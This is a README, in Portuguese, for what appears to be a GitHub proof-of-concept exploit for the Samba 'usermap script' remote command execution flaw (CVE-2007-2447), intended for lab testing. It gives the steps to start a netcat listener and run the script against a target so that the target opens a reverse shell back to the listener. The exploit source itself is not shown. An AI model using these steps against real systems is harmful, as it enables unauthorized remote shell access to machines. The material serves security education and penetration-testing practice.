
Exploit de prova de conceito para execução remota de comandos do script usermap do Samba (CVE-2007-2447) com entrega de payload de shell reversa para testes educacionais em laboratório.
PoC: Samba "usermap script" execução remota de comandos (CVE histórico). Este repositório contém um pequeno script de prova de conceito para pesquisa e revisão educacional. O script principal é usermap_script_Command_Execution.py.
Artigo de referência: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Clone o repositório e execute o script em um laboratório controlado. O PoC usa opcionalmente um reverse shell para LHOST:LPORT — inicie seu listener antes de executar o script e garanta que as dependências estejam instaladas (consulte Instalação).
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
Parâmetros
RHOST — IP ou hostname alvoRPORT — porta TCP alvo (tipicamente 139)LHOST — IP do listener para uma conexão reversaLPORT — porta do listenerRecomendado: crie um ambiente virtual Python isolado e instale as dependências do requirements.txt antes de executar o script.
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
Este código é fornecido apenas para pesquisa legítima de segurança, educação e testes defensivos. Não execute este script contra qualquer sistema que você não possua ou tenha permissão explícita por escrito para testar. O uso indevido pode levar a consequências legais; o proprietário do repositório não é responsável pelo uso indevido.
Sempre prefira revisão estática de código e testes em laboratório controlado (snapshots de VM, redes isoladas e capturas de pacotes) ao analisar código potencialmente perigoso.
Se você deseja um passo a passo anotado não executável ou um requirements.txt, abra uma issue ou solicite aqui.